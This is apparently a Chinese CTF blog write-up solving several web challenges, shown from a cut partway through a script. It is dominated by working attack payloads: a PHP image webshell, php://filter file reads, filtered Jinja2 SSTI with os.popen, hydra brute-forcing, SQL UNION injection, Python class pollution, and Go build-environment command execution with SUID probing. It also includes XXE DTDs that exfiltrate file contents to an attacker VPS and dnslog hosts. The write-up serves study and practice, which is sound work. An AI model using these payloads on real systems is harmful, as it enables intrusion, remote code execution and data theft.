            if use_webshell:
140
                 print("[!] 记得执行 'stty sane' 修复终端输入。")
141
            break
142
        except Exception as e:
143
            print(f"[-] 发生未知错误: {e}")
144
            break
145

146
if __name__ == "__main__":
147
    main()

[Week2] Look at the picture#

你想看什么图片都行，但只能是http协议哦~ 不要偷偷用其它的

challenge.ilovectf.cn:30333/?url=https%3A%2F%2Fpicsum.photos%2F500%2F500%3Frandom%3D2

显然是要修改url参数的请求头，尝试读取文件 challenge.ilovectf.cn:30333/?url=file://flag.txt 返回I see you.....，看来file头被过滤了。

尝试http://challenge.ilovectf.cn:30333/?url=http://127.0.0.1返回html

确实只允许http/https协议头。

1
from flask import Flask, redirect
2

3
app = Flask(__name__)
4

5
@app.route('/bypass')
6
def bypass():
7
    return redirect("file:///flag.txt", code=302)
8

9
if __name__ == '__main__':
10
    app.run(host='0.0.0.0', port=8090)

借Timmy的国内vps跑一段bypass（我的US搬瓦工不行，有IP段屏蔽）

bypass 39开头的是我本地，43开头是测试机，可以看到确实发生了302，不过，这这这，，，404？？这是跨域了吗？怎么读vps去了？

http://challenge.ilovectf.cn:30404/?url=https://ipw.cn/gongan.png看响应发现是base64，前台解码为图片

冷静思考，dirsearch先来一下，发现/www.zip 解压拿到index.php

1
<?php
2
// 随机图片URL数组
3
$randomImages = [
4
    'https://picsum.photos/500/500?random=1',
5
    'https://picsum.photos/500/500?random=2',
6
    'https://picsum.photos/500/500?random=3',
7
    'https://picsum.photos/500/500?random=4',
8
    'https://picsum.photos/500/500?random=5',
9
    'https://picsum.photos/500/500?random=6',
10
    'https://picsum.photos/500/500?random=7',
11
    'https://picsum.photos/500/500?random=8',
12
    'https://picsum.photos/500/500?random=9',
13
    'https://picsum.photos/500/500?random=10'
14
];
15

16
// 获取URL参数
17
$imageUrl = isset($_GET['url']) ? $_GET['url'] : '';
18
$blacklist_keywords = [
19
        'file://', 'file%3A//',
20
        'phar://', 'phar%3A//',
21
        'zip://', 'zip%3A//',
22
        'data:', 'data%3A',
23
        'glob://', 'glob%3A//',
24
        'expect://', 'expect%3A//',
25
        'ftp://', 'ftps://',
26
         'passwd', 'shadow', 'etc/', 'root', 'bin', 'bash',
27
        'base64',  'string.',  'rot13',
28
        'eval', 'system', 'exec', 'shell_exec', 'popen'
29
    ];
30
foreach ($blacklist_keywords as $keyword) {
31
        if (stripos($imageUrl, $keyword) !== false) {
32
            die("I see you.....");
33
        }
34
    }
35
// 如果没有URL参数，选择一个随机图片并重定向
36
if (empty($imageUrl)) {
37
    $randomImage = $randomImages[array_rand($randomImages)];
38
    header("Location: ?url=" . urlencode($randomImage));
39
    exit();
40
}
41

42
// 初始化变量
43
$base64Image = '';
44
$imageInfo = null;
45
$error = '';
46

47
if (!empty($imageUrl)) {
48
    // 验证URL格式
49
    if (filter_var($imageUrl, FILTER_VALIDATE_URL)) {
50
        // 使用file_get_contents获取图片内容
51
        $imageContent = @file_get_contents($imageUrl);
52

53
        if ($imageContent !== false) {
54
            // 获取图片信息
55
            $imageInfo = @getimagesizefromstring($imageContent);
56
            if ($imageInfo) {
57
                // 获取MIME类型
58
                $mimeType = $imageInfo['mime'];
59

60
                // 将图片内容转换为base64编码
61
                $base64Image = base64_encode($imageContent);
62
            } else {
63
                $error = '无法识别的图片格式 你的图片:'.$imageUrl.":".$imageContent;
64
            }
65
        } else {
66
            $error = '无法获取图片内容，请检查URL是否正确 '.$imageUrl.":".$imageContent;
67
        }
68
    } else {
69
        $error = '无效的URL格式';
70
    }
71
}
72
?>
73

74
<!DOCTYPE html>
75
<html lang="zh-CN">
76
<head>
77
    <meta charset="UTF-8">
78
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
79
    <title>图片展示</title>
80
    <style>
81
        * {
82
            margin: 0;
83
            padding: 0;
84
            box-sizing: border-box;
85
        }
86

87
        body {
88
            font-family: 'Arial', sans-serif;
89
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
90
            min-height: 100vh;
91
            display: flex;
92
            justify-content: center;
93
            align-items: center;
94
            padding: 20px;
95
        }
96

97
        .container {
98
            background: rgba(255, 255, 255, 0.95);
99
            border-radius: 20px;
100
            box-shadow: 0 20px 40px rgba(0, 0, 0, 0.1);
101
            padding: 40px;
102
            text-align: center;
103
            max-width: 600px;
104
            width: 100%;
105
            backdrop-filter: blur(10px);
106
        }
107

108
        .header {
109
            margin-bottom: 30px;
110
        }
111

112
        .header h1 {
113
            color: #333;
114
            font-size: 2.5em;
115
            margin-bottom: 10px;
116
            background: linear-gradient(45deg, #667eea, #764ba2);
117
            -webkit-background-clip: text;
118
            -webkit-text-fill-color: transparent;
119
            background-clip: text;
120
        }
121

122
        .header p {
123
            color: #666;
124
            font-size: 1.1em;
125
        }
126

127
        .image-container {
128
            position: relative;
129
            margin: 30px 0;
130
        }
131

132
        .avatar-frame {
133
            width: 250px;
134
            height: 250px;
135
            margin: 0 auto;
136
            border-radius: 50%;
137
            overflow: hidden;
138
            box-shadow: 0 15px 35px rgba(0, 0, 0, 0.2);
139
            border: 5px solid #fff;
140
            transition: transform 0.3s ease;
141
        }
142

143
        .avatar-frame:hover {
144
            transform: scale(1.05);
145
        }
146

147
        .avatar-image {
148
            width: 100%;
149
            height: 100%;
150
            object-fit: cover;
151
        }
152

153
        .info-box {
154
            background: linear-gradient(45deg, #667eea, #764ba2);
155
            color: white;
156
            padding: 20px;
157
            border-radius: 15px;
158
            margin-top: 30px;
159
        }
160

161
        .info-box h3 {
162
            margin-bottom: 15px;
163
            font-size: 1.3em;
164
        }
165

166
        .info-content {
167
            text-align: left;
168
            line-height: 1.6;
169
        }
170

171
        .error-message {
172
            background: #ff6b6b;
173
            color: white;
174
            padding: 20px;
175
            border-radius: 10px;
176
            margin: 20px 0;
177
            font-size: 1.1em;
178
        }
179

180
        .footer {
181
            margin-top: 30px;
182
            color: #888;
183
            font-size: 0.9em;
184
        }
185

186
        .controls {
187
            margin: 20px 0;
188
        }
189

190
        .btn {
191
            background: linear-gradient(45deg, #667eea, #764ba2);
192
            color: white;
193
            border: none;
194
            padding: 12px 25px;
195
            border-radius: 50px;
196
            font-size: 1em;
197
            cursor: pointer;
198
            transition: all 0.3s ease;
199
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
200
        }
201

202
        .btn:hover {
203
            transform: translateY(-3px);
204
            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2);
205
        }
206

207
        .btn:active {
208
            transform: translateY(1px);
209
        }
210

211
        .loading {
212
            display: none;
213
            font-size: 1.2em;
214
            color: #667eea;
215
            margin: 20px 0;
216
        }
217

218
        @media (max-width: 768px) {
219
            .container {
220
                padding: 20px;
221
            }
222

223
            .header h1 {
224
                font-size: 2em;
225
            }
226

227
            .avatar-frame {
228
                width: 200px;
229
                height: 200px;
230
            }
231
        }
232
    </style>
233
</head>
234
<body>
235
    <div class="container">
236
        <div class="header">
237
            <h1>图片展示</h1>
238
        </div>
239

240
        <div class="controls">
241
            <button id="refreshBtn" class="btn">获取新图片</button>
242
        </div>
243

244
        <?php if (!empty($error)): ?>
245
            <div class="error-message">
246
                错误：<?php echo htmlspecialchars($error); ?>
247
            </div>
248
        <?php elseif (!empty($base64Image)): ?>
249
            <div class="image-container">
250
                <div class="avatar-frame">
251
                    <img src="data:<?php echo $mimeType; ?>;base64,<?php echo $base64Image; ?>" alt="显示图片" class="avatar-image">
252
                </div>
253
            </div>
254

255
            <div class="info-box">
256
                <h3>图片信息</h3>
257
                <div class="info-content">
258
                    <p><strong>图片尺寸：</strong><?php echo $imageInfo[0]; ?> × <?php echo $imageInfo[1]; ?> 像素</p>
259
                    <p><strong>图片类型：</strong><?php echo $mimeType; ?></p>
260
                    <p><strong>文件大小：</strong><?php echo round(strlen(base64_decode($base64Image)) / 1024, 2); ?> KB</p>
261
                    <p><strong>来源URL：</strong><?php echo htmlspecialchars($imageUrl); ?></p>
262
                </div>
263
            </div>
264
        <?php endif; ?>
265
    </div>
266

267
    <script>
268
        // 随机图片URL数组
269
        const randomImages = [
270
            'https://picsum.photos/500/500?random=1',
271
            'https://picsum.photos/500/500?random=2',
272
            'https://picsum.photos/500/500?random=3',
273
            'https://picsum.photos/500/500?random=4',
274
            'https://picsum.photos/500/500?random=5',
275
            'https://picsum.photos/500/500?random=6',
276
            'https://picsum.photos/500/500?random=7',
277
            'https://picsum.photos/500/500?random=8',
278
            'https://picsum.photos/500/500?random=9',
279
            'https://picsum.photos/500/500?random=10'
280
        ];
281

282
        // 获取刷新按钮
283
        const refreshBtn = document.getElementById('refreshBtn');
284

285
        // 点击刷新按钮获取新图片
286
        refreshBtn.addEventListener('click', function() {
287
            const randomImage = randomImages[Math.floor(Math.random() * randomImages.length)];
288
            window.location.href = '?url=' + encodeURIComponent(randomImage);
289
        });
290
    </script>
291
</body>
292
</html>

有www.zip，大概率是利用zip实现目录穿越

我超！想复杂了，连php://都没限制

1
http://challenge.ilovectf.cn:30101/?url=php://filter/resource=../../../../flag

1
错误：无法识别的图片格式 你的图片:php://filter/resource=../../../../flag:flag{You_937_7HE_FIltEr}

好啊！

[Week2] Only Picture Up#

咦？上传一个图片就能得到flag？

提示很明显了，准备图片马

1
➜  web cat wow.jpg
2
<?php system($_GET['cmd']); ?>

http://challenge.ilovectf.cn:30445/?preview=wow.jpg&cmd=cat%20/FL4g94

flag{08416cde-c31b-4934-8404-dab0b39501a7}

[Week2] Regular Expression#

正则表达式是一个好工具！

1
<?php
2
highlight_file(__FILE__);
3
error_reporting(0);
4
include('flag.php');
5

6
if(isset($_GET["?"])){
7
    $_？ = $_GET['?'];
8
    if(preg_match('/^-(ctf|CTF)<\n>{5}[h-l]\d\d\W+@email\.com flag.\b$/', $_？) && strlen($_？) == 40) {
9
        echo 'Good job! Now I need you to write a regular expression for my string.</br>';
10
        if(isset($_POST['preg'])){
11
            $preg = str_replace("|","",$_POST['preg']);
12
            $test_string = 'Please\ 777give+. !me?<=-=>(.*)Flaggg0';
13
            if(preg_match('/'.$preg.'/', $test_string) && strlen($_POST['preg']) > 77){
14
                echo "Congratulations! Here is your flag: ".$flag;
15
            }else{
16
                echo "Almost succeeded!";
17
            }
18
        }
19
    }else{
20
        echo "Think twice, and go to study!!!";
21
    }
22
}else{
23
    echo "Welcome to ?ctf";
24
} Welcome to ?ctf

这啥呀，

1
/^-(ctf|CTF)<\n>{5}[h-l]\d\d\W+@email\.com flag.\b$/

payload为

1
-ctf<
2
>>>>>h00!!@email.com flagA

这里有坑，被<\n>{5}搞了好久，原来是<\n>>>>>，哈哈哈哈哈哈哈哈哈，笑傻了。

1
curl -i 'http://challenge.ilovectf.cn:30067/index.php?%3F=-ctf%3C%0A%3E%3E%3E%3E%3Eh00%21%21%21%21%21%21%21%21%21%21%40email.com%20flagA'

1
Good job! Now I need you to write a regular expression for my string.

接着构建下一个payload，这个简单，注意下长度即可：

1
curl -X POST 'http://challenge.ilovectf.cn:30067/index.php?%3F=-ctf%3C%0A%3E%3E%3E%3E%3Eh00%21%21%21%21%21%21%21%21%21%21%40email.com%20flagA' \
2
  -d 'preg=.*Flaggg0(?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)'

1
Good job! Now I need you to write a regular expression for my string.</br>Congratulations! Here is your flag: flag{3ad3a3e5-2201-4313-b7d2-4f0ec314256e}

[Week2] 留言板#

jinjia2

1
{{7*7}}
2
49

1
{{ request.application.__globals__.__builtins__.__import__('os').popen('ls /').read() }}
2

3
no " ' "!！ ( 加点小过滤不介意吧^_^
4

5
{{[].__class__.__base__}}
6

7
<class 'object'>

单双引号、url_for都无法使用。

1
{{ some_object.__init__.__globals__.__builtins__.chr(108) ~ some_object.__init__.__globals__.__builtins__.chr(115) }}

输出ls，哈哈哈哈

1
➜  ~ curl -X POST 'http://challenge.ilovectf.cn:30476/ssti?u1=_&c=c&l=l&a=a&s=s&i=i&n=n&g=g&o=o&p=p&e=e&t=t&sp=%20&m=m&r=r&k=k&b=b' \
2
-H 'Content-Type: application/x-www-form-urlencoded' \
3
--data-urlencode 'message={{url_for|attr(request.args.u1~request.args.u1~request.args.g~request.args.l~request.args.o~request.args.b~request.args.a~request.args.l~request.args.s~request.args.u1~request.args.u1)[request.args.o~request.args.s]|attr(request.args.p~request.args.o~request.args.p~request.args.e~request.args.n)(request.args.l~request.args.s)|join}}'
4
no " url_for "!！ ( 加点小过滤不介意吧^_^%

1
curl -X POST 'http://challenge.ilovectf.cn:30084/ssti' --data-urlencode 'message={{7*7}}'

https://github.com/Marven11/Fenjing/我超，这是什么东西？？！！

1
python -m fenjing crack --url 'http://challenge.ilovectf.cn:30084/ssti' --detect-mode fast --inputs message --method POST

fenjing

[Week2] 登录和查询#

看网页源码拿到百度网盘，获得字典和提示

1
恭喜你找到了这里，你是个很棒的ctfer
2

3
登录密码和用户名就藏在这个目录下的字典里面，不要去用别的字典哦，服务器的小心肝受不了。
4

5
越过登录界面之后还有一关，flag就在在flags表里面可是id为多少呢？

hydra一把梭

1
➜  [Week2] 登录和查询 hydra -s 30049 -v -L 字典.txt -P 字典.txt challenge.ilovectf.cn http-post-form "/login.php:username=^USER^&password=^PASS^:F=错误"
2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
3

4
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-09 07:14:13
5
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4900 login tries (l:70/p:70), ~307 tries per task
6
[DATA] attacking http-post-form://challenge.ilovectf.cn:30049/login.php:username=^USER^&password=^PASS^:F=错误
7
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
8
[STATUS] 1822.00 tries/min, 1822 tries in 00:01h, 3078 to do in 00:02h, 16 active
9
[VERBOSE] Page redirected to http[s]://challenge.ilovectf.cn:30049/flag.php
10
[30049][http-post-form] host: challenge.ilovectf.cn   login: admin   password: admin123

登陆后跳转到http://challenge.ilovectf.cn:30049/flag.php，提示You_are_so_a_go0d_ctfer

构造id请求http://challenge.ilovectf.cn:30049/flag.php?id=2提示try_use_union!Okkk

尝试有几个字段，发现http://challenge.ilovectf.cn:30049/flag.php?id=-1' UNION SELECT 1,2,3--+提示123

http://challenge.ilovectf.cn:30049/flag.php?id=-1' UNION SELECT 1,2,flag FROM flags--+提示 12OH!YOU_AR3_1N_RIGHT_WA7_

提交flag{OH!YOU_AR3_1N_RIGHT_WA7_}，并不正确。看提示：flag就在在flags表里面，猜测flag并不在flag里。

列出flags表下所有行

1
http://challenge.ilovectf.cn:30049/flag.php?id=-1' UNION SELECT 1,2,group_concat(id, ':', flag) FROM flags--+

成功夺旗

1
121:OH!YOU_AR3_1N_RIGHT_WA7_,2:flag{28778804-9c7d-4cd2-9a6f-972d89c79139}

果然有两行，提交。其实提示很多，全程都有，很贴心了。

[Week2] 这是什么函数#

没见过？搜一下！在/flag

看不懂思密达，问一下Gemini：

1
前端页面分析:
2

3
标题与提示: 题目名称是“这是什么函数?”，页面内提示“题目问函数，可是这个页面里面哪有函数？”和“信息搜集一下，不在这个页面哦”。这强烈暗示我们需要寻找源码或线索来发现后端使用的关键函数。
4

5
核心功能: 页面提供一个 JSON 输入框，点击按钮后，会通过 JavaScript fetch 函数向 /pollute 路径发送一个 POST 请求，Content-Type 为 application/json。
6

7
关键点: 路径名 /pollute 是一个非常明显的提示，指向了 原型链污染 (Prototype Pollution) 漏洞。提交数据后弹窗提示“你应该找找这个包要干什么”，进一步说明后端使用了某个具体的第三方库（包）来处理 JSON 数据，而这个库存在漏洞。
8

9
漏洞识别:
10

11
原型链污染 (Prototype Pollution): 这是 JavaScript 的一种漏洞。当一个应用不安全地合并（merge）或克隆（clone）对象时，攻击者可以利用 __proto__ 或 constructor.prototype 等键来修改 Object.prototype（所有对象的原型）。一旦原型被污染，可能会导致拒绝服务（DoS）、权限提升，甚至远程代码执行（RCE）。
12

13
目标: 我们的目标是构造一个恶意的 JSON 数据，发送到 /pollute 接口，污染服务器的 JS 环境，然后在访问 /flag 页面时触发我们植入的恶意行为，从而读取到 flag。

找篇文章学习一下：https://zhuanlan.zhihu.com/p/8675630190

1
(base) ➜  ~ dirsearch -u http://challenge.ilovectf.cn:30056/
2

3
  _|. _ _  _  _  _ _|_    v0.4.3.post1
4
 (_||| _) (/_(_|| (_| )
5

6
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
7

8
Output File: /Users/chao/reports/http_challenge.ilovectf.cn_30056/__25-10-09_08-23-24.txt
9

10
Target: http://challenge.ilovectf.cn:30056/
11

12
[08:23:24] Starting:
13
[08:28:23] 200 -   39B  - /flag
14
[08:31:20] 200 -    1KB - /src
15

16
Task Completed

我超！这个也太强了。访问/src，获得源码，原来是flask吗（我以为是node.js）

1
from flask import Flask, request, render_template
2
import json
3

4
app = Flask(__name__)
5

6

7
def merge(src, dst):
8
    for k, v in src.items():
9
        if hasattr(dst, "__getitem__"):
10
            if dst.get(k) and type(v) == dict:
11
                merge(v, dst.get(k))
12
            else:
13
                dst[k] = v
14
        elif hasattr(dst, k) and type(v) == dict:
15
            merge(v, getattr(dst, k))
16
        else:
17
            setattr(dst, k, v)
18

19

20
def is_json(data):
21
    try:
22
        json.loads(data)
23
        return True
24
    except ValueError:
25
        return False
26

27

28
class cls():
29
    def __init__(self):
30
        pass
31

32

33
instance = cls()
34
cat = "where is the flag?"
35
dog = "how to get the flag?"
36

37

38
@app.route("/", methods=["GET", "POST"])
39
def index():
40
    return render_template("index.html")
41

42

43
@app.route("/flag", methods=["GET", "POST"])
44
def flag():
45
    with open("/flag", "r") as f:
46
        flag = f.read().strip()
47

48
    if cat == dog:
49
        return flag
50
    else:
51
        return cat + " " + dog
52

53

54
@app.route("/src", methods=["GET", "POST"])
55
def src():
56
    return open(__file__, encoding="utf-8").read()
57

58

59
@app.route("/pollute", methods=["GET", "POST"])
60
def Pollution():
61
    if request.is_json:
62
        merge(json.loads(request.data), instance)
63
    else:
64
        return "fail"
65
    return "success"
66

67

68
if __name__ == "__main__":
69
    app.run(host="0.0.0.0", port=5000)

那就是 Object Pollution 了是吧？要让if cat == dog:

1
(base) ➜  ~ curl -X POST -H "Content-Type: application/json" \
2
     -d '{"__init__": {"__globals__": {"dog": "where is the flag?"}}}' \
3
     http://challenge.ilovectf.cn:30056/pollute
4
success%
5

6
(base) ➜  ~ curl http://challenge.ilovectf.cn:30056/flag
7
flag{78fc813f-b506-4c1a-b1f0-1017eea2a0ec}%

[Week3] VIP#

先探索一下

1
{{.Utils.GetReader "/flag.txt" | .Utils.ReadAll}}
2
模板执行错误: template: name:1:22: executing "name" at <.Utils.GetReader>: error calling GetReader: open /flag.txt: permission denied
3

4
{{.Utils.GetReader "/etc/passwd" | .Utils.ReadAll}}
5
输出结果: root:x:0:0:root:/root:/bin/sh
6
bin:x:1:1:bin:/bin:/sbin/nologin
7
daemon:x:2:2:daemon:/sbin:/sbin/nologin
8
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
9
sync:x:5:0:sync:/sbin:/bin/sync
10
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
11
halt:x:7:0:halt:/sbin:/sbin/halt
12
mail:x:8:12:mail:/var/mail:/sbin/nologin
13
news:x:9:13:news:/usr/lib/news:/sbin/nologin
14
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
15
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
16
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
17
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
18
games:x:35:35:games:/usr/games:/sbin/nologin
19
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
20
guest:x:405:100:guest:/dev/null:/sbin/nologin
21
nobody:x:65534:65534:nobody:/:/sbin/nologin
22
app:x:1000:1000:Linux User,,,:/home/app:/sbin/nologin
23

24
{{.Utils.GetReader "/proc/self/environ" | .Utils.ReadAll}}
25
输出结果: HOME=/appGOCACHE=/tmp/go-buildGOPATH=/tmp/gopathSECRET_KEY_PATH=/app/secret_key.txtPATH=/usr/local/go/bin:/usr/bin:/bin

发现SECRET_KEY_PATH=/app/secret_key.txt

1
{{.Utils.GetReader "/app/secret_key.txt" | .Utils.ReadAll}}
2
输出结果: qrUt3cA7EyB30rkDNnroMrD9skQ2JEG8zMr

1
runtime: /usr/local/go/pkg/tool/linux_amd64/compile: signal: killed

？？？OOM了，联系学长调大内存，继续。

尝试embed，但无法跨越目录，卒。

1
package main
2

3
import (
4
    _ "embed" // 如果只使用 //go:embed，导入包时可以加下划线避免未使用报错
5
    "fmt"
6
)
7

8
//go:embed "main.go"
9
var embedFile string
10

11
func main() {
12
    fmt.Println("flag:", embedFile)
13
}

尝试内嵌C，permission denied，卒

1
curl -X POST \
2
  'http://challenge.ilovectf.cn:30224/vip/build' \
3
  -H 'Content-Type: application/json' \
4
  -H 'X-API-Key: qrUt3cA7EyB30rkDNnroMrD9skQ2JEG8zMr' \
5
  -d '{
6
    "env": {
7
      "CGO_ENABLED": "1",
8
      "CGO_CFLAGS": "-include /flag.txt"
9
    },
10
    "code": "package main\n\n/*\n#include <stdio.h>\n*/\nimport \"C\"\n\nfunc main() {\n\t\n}"
11
  }'
12
{"details":"# runtime/cgo\n\u003ccommand-line\u003e: fatal error: /flag.txt: Permission denied\ncompilation terminated.\n","error":"编译失败","reason":"exit status 1"}

尝试GOFLAGS，哦吼！有戏？

1
{
2
    "code": "package main\n\nfunc main() {}",
3
    "env": {
4
        "GOFLAGS": "-toolexec=\"cat\""
5
    }
6
}
7

8
curl -X POST 'http://challenge.ilovectf.cn:30224/vip/build' \
9
-H 'X-API-Key: qrUt3cA7EyB30rkDNnroMrD9skQ2JEG8zMr' \
10
-H 'Content-Type: application/json' \
11
--data @payload.json
12
{"details":"cat: unrecognized option: V\nBusyBox v1.36.1 (2025-08-05 16:44:32 UTC) multi-call binary.\n\nUsage: cat [-nbvteA] [FILE]...\n\nPrint FILEs to stdout\n\n\t-n\tNumber output lines\n\t-b\tNumber nonempty lines\n\t-v\tShow nonprinting characters as ^x or M-x\n\t-t\t...and tabs as ^I\n\t-e\t...and end lines with $\n\t-A\tSame as -vte\ncat: unrecognized option: V\nBusyBox v1.36.1 (2025-08-05 16:44:32 UTC) multi-call binary.\n\nUsage: cat [-nbvteA] [FILE]...\n\nPrint FILEs to stdout\n\n\t-n\tNumber output lines\n\t-b\tNumber nonempty lines\n\t-v\tShow nonprinting characters as ^x or M-x\n\t-t\t...and tabs as ^I\n\t-e\t...and end lines with $\n\t-A\tSame as -vte\ngo: error obtaining buildID for go tool compile: exit status 1\ncat: unrecognized option: V\nBusyBox v1.36.1 (2025-08-05 16:44:32 UTC) multi-call binary.\n\nUsage: cat [-nbvteA] [FILE]...\n\nPrint FILEs to stdout\n\n\t-n\tNumber output lines\n\t-b\tNumber nonempty lines\n\t-v\tShow nonprinting characters as ^x or M-x\n\t-t\t...and tabs as ^I\n\t-e\t...and end lines with $\n\t-A\tSame as -vte\ngo: error obtaining buildID for go tool compile: exit status 1\ngo: error obtaining buildID for go tool compile: exit status 1\ncat: unrecognized option: V\nBusyBox v1.36.1 (2025-08-05 16:44:32 UTC) multi-call binary.\n\nUsage: cat [-nbvteA] [FILE]...\n\nPrint FILEs to stdout\n\n\t-n\tNumber output lines\n\t-b\tNumber nonempty lines\n\t-v\tShow nonprinting characters as ^x or M-x\n\t-t\t...and tabs as ^I\n\t-e\t...and end lines with $\n\t-A\tSame as -vte\n","error":"编译失败","reason":"exit status 1"}%

不能有空格，卒。

尝试CGO，Gooooood

1
{
2
    "code": "package main\n\nimport \"C\"\n\nfunc main() {}",
3
    "env": {
4
        "CC": "sh -c 'uname -a; exit 0'"
5
    }
6
}

可以可以，正常执行了，但/flag.txt还是没权限，考虑SUID提权（其实早该想到了）

1
{
2
    "code": "package main\n\nimport \"C\"\n\nfunc main() {}",
3
    "env": {
4
        "CC": "sh -c 'find / -perm -u=s -type f 2>/dev/null; exit 0'"
5
    }
6
}

1
curl -X POST 'http://challenge.ilovectf.cn:30224/vip/build' \
2
-H 'X-API-Key: qrUt3cA7EyB30rkDNnroMrD9skQ2JEG8zMr' \
3
-H 'Content-Type: application/json' \
4
--data @payload.json
5
{"details":"# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\n/usr/local/bin/flagread\n# runtime/cgo\ncgo: cannot parse $WORK/b003/_cgo_.o as ELF, Mach-O, PE or XCOFF\n","error":"编译失败","reason":"exit status 1"}%

哦吼？/usr/local/bin/flagread

1
{
2
    "code": "package main\n\nimport \"C\"\n\nfunc main() {}",
3
    "env": {
4
        "CC": "sh -c '/usr/local/bin/flagread; exit 0'"
5
    }
6
}

1
(base) ➜  [Week3] VIP curl -X POST 'http://challenge.ilovectf.cn:30224/vip/build' \
2
-H 'X-API-Key: qrUt3cA7EyB30rkDNnroMrD9skQ2JEG8zMr' \
3
-H 'Content-Type: application/json' \
4
--data @payload.json
5
{"details":"# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\nflag{5176c02f-a853-421b-9f76-86ba379d41e6}}\n# runtime/cgo\ncgo: cannot parse $WORK/b003/_cgo_.o as ELF, Mach-O, PE or XCOFF\n","error":"编译失败","reason":"exit status 1"}%

GOoooooooD,一血！

[Week3] 查查忆#

查一查关于XML的回忆

ENTITY被过滤

1
<!ENTITY % file_content SYSTEM "php://filter/read=convert.base64-encode/resource=/f1111llllaa44g">
2
<!ENTITY % exfil "<!ENTITY send SYSTEM 'http://vps的ip地址/probe-hit?flag=%file_content;'>">
3
%exfil;

1
<?xml version="1.0"?>
2
<!DOCTYPE root SYSTEM "http://vps的ip地址/test3.dtd">
3
<xxx>&send;</xxx>

vps上起一个python -m http.server 80 （用80是因为懒得去后台放行端口💦）

xxe

1
ZmxhZ3tjNDc1YWU3ZC1hNGNhLTQyZmUtYWIxNC1lMzFkMTllMTQxMzl9
2

3
flag{c475ae7d-a4ca-42fe-ab14-e31d19e14139}

艰难探索：

1
<?xml version="1.0" ?>
2
<!DOCTYPE memory SYSTEM "https://week3.free.beeceptor.com/evil.dtd">
3
<memory>&xxe;</memory>
4

5
<root xmlns:xi="http://www.w3.org/2001/XInclude">
6
    <xi:include href="file:///f1111llllaa44g" parse="text"/>
7
</root>
8

9

10
<!DOCTYPE root SYSTEM "file:///f1111llllaa44g">
11
<root/>提示failed!，如果把路径改为一个不存在的，反而变成success了。base64编码的payload，<!DOCTYPE root SYSTEM "data:text/plain;base64,PCFFTlRJVFklICUgZmlsZSBTWVNURU0gImZpbGU6Ly8vZjExMTFsbGxsbGFhNDRnIj48IUVOVElUWSAlIGV2YWwgIjwhRU5USVRZICYjeDI1OyBlcnJvciBTWVNURU0gJ2ZpbGU6Ly8vbm9uZXhpc3RlbnQvJWZpbGU7Jz4iPiVldmFsOyVlcnJvcjs=">
12
<root/>提示failed，但改成<!DOCTYPE root SYSTEM "data:text/plain;base64,==">
13
<root/>又提示success
14

15

16
<?xml version="1.0"?>
17
<!DOCTYPE root SYSTEM "http://vps/evil.dtd">
18
<root>&send;</root>
19

20

21
<!-- probe_evil.dtd -->
22
<!ENTITY send_http SYSTEM "http://vps/probe-hit?tag=probe1">
23

24

25
<!ENTITY send_http SYSTEM "http://vps/probe-hit?tag=probe1">
26
<!ENTITY % file SYSTEM "file:///f1111llllaa44g">
27
<!ENTITY all "<!ENTITY exfil SYSTEM 'http://vps/exp?data=%file;'>">
28

29

30
<!-- dns.dtd -->
31
<!ENTITY % test SYSTEM "http://test.3akofe.dnslog.cn/">
32
<!ENTITY % file SYSTEM "file:///f1111llllaa44g">
33
<!ENTITY % e SYSTEM "http://%file;.3akofe.dnslog.cn/">
34
%
35
%e;
36

37

38
<!ENTITY % file SYSTEM "file:///etc/passwd">
39
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://vps/?%file;'>">
40
%all;
41

42
<?xml version="1.0"?>
43
